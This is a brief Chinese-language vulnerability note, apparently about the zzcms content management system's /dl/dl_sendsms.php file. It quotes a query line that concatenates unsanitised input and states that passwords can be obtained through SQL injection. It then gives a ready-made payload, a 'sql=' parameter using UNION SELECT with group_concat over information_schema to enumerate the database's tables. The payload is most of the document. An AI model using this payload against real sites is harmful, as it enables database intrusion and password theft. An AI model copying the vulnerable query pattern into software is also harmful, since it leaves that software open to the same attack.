文件地址:

/dl/dl_sendsms.php

$sql2=$sql." order by id asc limit $n,$size";

可以通过SQL注入获取密码

构建

sql=select email from zzcms_dl where id=-1 union select group_concat(distinct table_name) from information_schema.columns where table_schema=database()#